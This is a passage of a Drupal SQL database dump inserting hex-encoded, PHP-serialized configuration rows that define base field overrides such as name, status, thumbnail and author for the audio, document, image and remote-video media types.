('', 'core.base_field_override.media.audio.name', 0x613a31363a7b733a343a2275756964223b733a33363a2238353031303038362d393165322d343732312d383732642d306661343135323136613538223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e617564696f223b7d7d733a323a226964223b733a31363a226d656469612e617564696f2e6e616d65223b733a31303a226669656c645f6e616d65223b733a343a226e616d65223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22617564696f223b733a353a226c6162656c223b733a343a224e616d65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b733a303a22223b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a363a22737472696e67223b7d),
('', 'core.base_field_override.media.audio.path', 0x613a31363a7b733a343a2275756964223b733a33363a2265396439333336352d636337352d346463382d616334612d626339353861316664383333223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e617564696f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2270617468223b7d7d733a323a226964223b733a31363a226d656469612e617564696f2e70617468223b733a31303a226669656c645f6e616d65223b733a343a2270617468223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22617564696f223b733a353a226c6162656c223b733a393a2255524c20616c696173223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a343a2270617468223b7d),
('', 'core.base_field_override.media.audio.status', 0x613a31363a7b733a343a2275756964223b733a33363a2236323830326638662d323361652d343235342d383461652d636630663236373939336165223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e617564696f223b7d7d733a323a226964223b733a31383a226d656469612e617564696f2e737461747573223b733a31303a226669656c645f6e616d65223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22617564696f223b733a353a226c6162656c223b733a393a225075626c6973686564223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a313b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.media.audio.thumbnail', 0x613a31363a7b733a343a2275756964223b733a33363a2234656138653562302d623836352d346465302d383338612d356539356661626163666664223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e617564696f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a353a22696d616765223b7d7d733a323a226964223b733a32313a226d656469612e617564696f2e7468756d626e61696c223b733a31303a226669656c645f6e616d65223b733a393a227468756d626e61696c223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22617564696f223b733a353a226c6162656c223b733a393a225468756d626e61696c223b733a31313a226465736372697074696f6e223b733a33323a22546865207468756d626e61696c206f6620746865206d65646961206974656d2e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a31323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a33313a225b646174653a637573746f6d3a595d2d5b646174653a637573746f6d3a6d5d223b733a31353a2266696c655f657874656e73696f6e73223b733a31363a22706e6720676966206a7067206a706567223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31343a226d61785f7265736f6c7574696f6e223b733a303a22223b733a31343a226d696e5f7265736f6c7574696f6e223b733a303a22223b733a393a22616c745f6669656c64223b623a313b733a31383a22616c745f6669656c645f7265717569726564223b623a313b733a31313a227469746c655f6669656c64223b623a303b733a32303a227469746c655f6669656c645f7265717569726564223b623a303b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b4e3b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a31303a226669656c645f74797065223b733a353a22696d616765223b7d),
('', 'core.base_field_override.media.audio.uid', 0x613a31363a7b733a343a2275756964223b733a33363a2264326363333761612d396564362d343263352d616562622d353266363262633839343163223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e617564696f223b7d7d733a323a226964223b733a31353a226d656469612e617564696f2e756964223b733a31303a226669656c645f6e616d65223b733a333a22756964223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22617564696f223b733a353a226c6162656c223b733a31313a22417574686f726564206279223b733a31313a226465736372697074696f6e223b733a32363a225468652075736572204944206f662074686520617574686f722e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34383a2244727570616c5c6d656469615c456e746974795c4d656469613a3a67657444656661756c74456e746974794f776e6572223b733a383a2273657474696e6773223b613a323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d733a31303a226669656c645f74797065223b733a31363a22656e746974795f7265666572656e6365223b7d),
('', 'core.base_field_override.media.document.changed', 0x613a31363a7b733a343a2275756964223b733a33363a2264633138663437352d356133322d346539652d613036332d636331333235656437313832223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a226d656469612e747970652e646f63756d656e74223b7d7d733a323a226964223b733a32323a226d656469612e646f63756d656e742e6368616e676564223b733a31303a226669656c645f6e616d65223b733a373a226368616e676564223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a353a226c6162656c223b733a373a224368616e676564223b733a31313a226465736372697074696f6e223b733a34303a225468652074696d6520746865206d65646961206974656d20776173206c617374206564697465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a226368616e676564223b7d),
('', 'core.base_field_override.media.document.created', 0x613a31363a7b733a343a2275756964223b733a33363a2263616233303039612d663661632d346265312d383534662d663831323139393839363638223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a226d656469612e747970652e646f63756d656e74223b7d7d733a323a226964223b733a32323a226d656469612e646f63756d656e742e63726561746564223b733a31303a226669656c645f6e616d65223b733a373a2263726561746564223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a353a226c6162656c223b733a31313a22417574686f726564206f6e223b733a31313a226465736372697074696f6e223b733a33363a225468652074696d6520746865206d65646961206974656d2077617320637265617465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34313a2244727570616c5c6d656469615c456e746974795c4d656469613a3a6765745265717565737454696d65223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a2263726561746564223b7d),
('', 'core.base_field_override.media.document.name', 0x613a31363a7b733a343a2275756964223b733a33363a2236653339306431642d306636372d343233322d623363372d613566366134636135323939223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a226d656469612e747970652e646f63756d656e74223b7d7d733a323a226964223b733a31393a226d656469612e646f63756d656e742e6e616d65223b733a31303a226669656c645f6e616d65223b733a343a226e616d65223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a353a226c6162656c223b733a343a224e616d65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b733a303a22223b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a363a22737472696e67223b7d),
('', 'core.base_field_override.media.document.path', 0x613a31363a7b733a343a2275756964223b733a33363a2264323231383963612d656633372d346136342d623565352d363535626166336637366338223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a226d656469612e747970652e646f63756d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2270617468223b7d7d733a323a226964223b733a31393a226d656469612e646f63756d656e742e70617468223b733a31303a226669656c645f6e616d65223b733a343a2270617468223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a353a226c6162656c223b733a393a2255524c20616c696173223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a343a2270617468223b7d),
('', 'core.base_field_override.media.document.status', 0x613a31363a7b733a343a2275756964223b733a33363a2234333932376439652d646530662d346564632d616633652d616162633536623763626563223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a226d656469612e747970652e646f63756d656e74223b7d7d733a323a226964223b733a32313a226d656469612e646f63756d656e742e737461747573223b733a31303a226669656c645f6e616d65223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a353a226c6162656c223b733a393a225075626c6973686564223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a313b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'core.base_field_override.media.document.thumbnail', 0x613a31363a7b733a343a2275756964223b733a33363a2263663061323739652d653339302d346665362d396262662d323130313633663935356264223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a226d656469612e747970652e646f63756d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a353a22696d616765223b7d7d733a323a226964223b733a32343a226d656469612e646f63756d656e742e7468756d626e61696c223b733a31303a226669656c645f6e616d65223b733a393a227468756d626e61696c223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a353a226c6162656c223b733a393a225468756d626e61696c223b733a31313a226465736372697074696f6e223b733a33323a22546865207468756d626e61696c206f6620746865206d65646961206974656d2e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a31323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a33313a225b646174653a637573746f6d3a595d2d5b646174653a637573746f6d3a6d5d223b733a31353a2266696c655f657874656e73696f6e73223b733a31363a22706e6720676966206a7067206a706567223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31343a226d61785f7265736f6c7574696f6e223b733a303a22223b733a31343a226d696e5f7265736f6c7574696f6e223b733a303a22223b733a393a22616c745f6669656c64223b623a313b733a31383a22616c745f6669656c645f7265717569726564223b623a313b733a31313a227469746c655f6669656c64223b623a303b733a32303a227469746c655f6669656c645f7265717569726564223b623a303b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b4e3b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a31303a226669656c645f74797065223b733a353a22696d616765223b7d),
('', 'core.base_field_override.media.document.uid', 0x613a31363a7b733a343a2275756964223b733a33363a2237656561646537362d393264352d343834342d616231322d313265616432396135613431223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31393a226d656469612e747970652e646f63756d656e74223b7d7d733a323a226964223b733a31383a226d656469612e646f63756d656e742e756964223b733a31303a226669656c645f6e616d65223b733a333a22756964223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a383a22646f63756d656e74223b733a353a226c6162656c223b733a31313a22417574686f726564206279223b733a31313a226465736372697074696f6e223b733a32363a225468652075736572204944206f662074686520617574686f722e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34383a2244727570616c5c6d656469615c456e746974795c4d656469613a3a67657444656661756c74456e746974794f776e6572223b733a383a2273657474696e6773223b613a323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d733a31303a226669656c645f74797065223b733a31363a22656e746974795f7265666572656e6365223b7d),
('', 'core.base_field_override.media.image.changed', 0x613a31363a7b733a343a2275756964223b733a33363a2231346135343861382d353538312d343762312d613066372d303933363264336436303034223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e696d616765223b7d7d733a323a226964223b733a31393a226d656469612e696d6167652e6368616e676564223b733a31303a226669656c645f6e616d65223b733a373a226368616e676564223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a353a226c6162656c223b733a373a224368616e676564223b733a31313a226465736372697074696f6e223b733a34303a225468652074696d6520746865206d65646961206974656d20776173206c617374206564697465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a226368616e676564223b7d),
('', 'core.base_field_override.media.image.created', 0x613a31363a7b733a343a2275756964223b733a33363a2264393339643965622d663433652d343163372d393862342d646130353331313431383839223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e696d616765223b7d7d733a323a226964223b733a31393a226d656469612e696d6167652e63726561746564223b733a31303a226669656c645f6e616d65223b733a373a2263726561746564223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a353a226c6162656c223b733a31313a22417574686f726564206f6e223b733a31313a226465736372697074696f6e223b733a33363a225468652074696d6520746865206d65646961206974656d2077617320637265617465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34313a2244727570616c5c6d656469615c456e746974795c4d656469613a3a6765745265717565737454696d65223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a2263726561746564223b7d),
('', 'core.base_field_override.media.image.name', 0x613a31363a7b733a343a2275756964223b733a33363a2231616537373165642d633930302d343739342d613634612d376531333637623032653864223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e696d616765223b7d7d733a323a226964223b733a31363a226d656469612e696d6167652e6e616d65223b733a31303a226669656c645f6e616d65223b733a343a226e616d65223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a353a226c6162656c223b733a343a224e616d65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b733a303a22223b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a363a22737472696e67223b7d),
('', 'core.base_field_override.media.image.path', 0x613a31363a7b733a343a2275756964223b733a33363a2263396264653663652d353530302d346666312d383839332d633432386231643361653832223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e696d616765223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2270617468223b7d7d733a323a226964223b733a31363a226d656469612e696d6167652e70617468223b733a31303a226669656c645f6e616d65223b733a343a2270617468223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a353a226c6162656c223b733a393a2255524c20616c696173223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a343a2270617468223b7d),
('', 'core.base_field_override.media.image.status', 0x613a31363a7b733a343a2275756964223b733a33363a2239633666663865302d333238342d343161642d623231372d393338373138353363623937223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e696d616765223b7d7d733a323a226964223b733a31383a226d656469612e696d6167652e737461747573223b733a31303a226669656c645f6e616d65223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a353a226c6162656c223b733a393a225075626c6973686564223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a313b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.media.image.thumbnail', 0x613a31363a7b733a343a2275756964223b733a33363a2231316338336530392d623865322d343962342d393737622d353039373266383438653431223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e696d616765223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a353a22696d616765223b7d7d733a323a226964223b733a32313a226d656469612e696d6167652e7468756d626e61696c223b733a31303a226669656c645f6e616d65223b733a393a227468756d626e61696c223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a353a226c6162656c223b733a393a225468756d626e61696c223b733a31313a226465736372697074696f6e223b733a33323a22546865207468756d626e61696c206f6620746865206d65646961206974656d2e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a31323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a33313a225b646174653a637573746f6d3a595d2d5b646174653a637573746f6d3a6d5d223b733a31353a2266696c655f657874656e73696f6e73223b733a31363a22706e6720676966206a7067206a706567223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31343a226d61785f7265736f6c7574696f6e223b733a303a22223b733a31343a226d696e5f7265736f6c7574696f6e223b733a303a22223b733a393a22616c745f6669656c64223b623a313b733a31383a22616c745f6669656c645f7265717569726564223b623a313b733a31313a227469746c655f6669656c64223b623a303b733a32303a227469746c655f6669656c645f7265717569726564223b623a303b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b4e3b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a31303a226669656c645f74797065223b733a353a22696d616765223b7d),
('', 'core.base_field_override.media.image.uid', 0x613a31363a7b733a343a2275756964223b733a33363a2263666231643537662d356566652d346534382d383865342d653533346263383632656538223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e696d616765223b7d7d733a323a226964223b733a31353a226d656469612e696d6167652e756964223b733a31303a226669656c645f6e616d65223b733a333a22756964223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22696d616765223b733a353a226c6162656c223b733a31313a22417574686f726564206279223b733a31313a226465736372697074696f6e223b733a32363a225468652075736572204944206f662074686520617574686f722e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34383a2244727570616c5c6d656469615c456e746974795c4d656469613a3a67657444656661756c74456e746974794f776e6572223b733a383a2273657474696e6773223b613a323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d733a31303a226669656c645f74797065223b733a31363a22656e746974795f7265666572656e6365223b7d),
('', 'core.base_field_override.media.remote_video.changed', 0x613a31363a7b733a343a2275756964223b733a33363a2238333334356437372d323933352d343364622d623563392d663133353138353833373065223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d7d733a323a226964223b733a32363a226d656469612e72656d6f74655f766964656f2e6368616e676564223b733a31303a226669656c645f6e616d65223b733a373a226368616e676564223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a353a226c6162656c223b733a373a224368616e676564223b733a31313a226465736372697074696f6e223b733a34303a225468652074696d6520746865206d65646961206974656d20776173206c617374206564697465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a226368616e676564223b7d),
('', 'core.base_field_override.media.remote_video.created', 0x613a31363a7b733a343a2275756964223b733a33363a2231373930643364642d343038662d346262662d626433642d383434343731373133626336223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d7d733a323a226964223b733a32363a226d656469612e72656d6f74655f766964656f2e63726561746564223b733a31303a226669656c645f6e616d65223b733a373a2263726561746564223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a353a226c6162656c223b733a31313a22417574686f726564206f6e223b733a31313a226465736372697074696f6e223b733a33363a225468652074696d6520746865206d65646961206974656d2077617320637265617465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34313a2244727570616c5c6d656469615c456e746974795c4d656469613a3a6765745265717565737454696d65223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a2263726561746564223b7d),
('', 'core.base_field_override.media.remote_video.name', 0x613a31363a7b733a343a2275756964223b733a33363a2238623530363535372d343366642d343865362d393161652d373634663766393133396263223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d7d733a323a226964223b733a32333a226d656469612e72656d6f74655f766964656f2e6e616d65223b733a31303a226669656c645f6e616d65223b733a343a226e616d65223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a353a226c6162656c223b733a343a224e616d65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b733a303a22223b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a363a22737472696e67223b7d),
('', 'core.base_field_override.media.remote_video.path', 0x613a31363a7b733a343a2275756964223b733a33363a2237383933663530652d656463342d346361622d623138382d376236346237363230613333223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2270617468223b7d7d733a323a226964223b733a32333a226d656469612e72656d6f74655f766964656f2e70617468223b733a31303a226669656c645f6e616d65223b733a343a2270617468223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a353a226c6162656c223b733a393a2255524c20616c696173223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a343a2270617468223b7d),
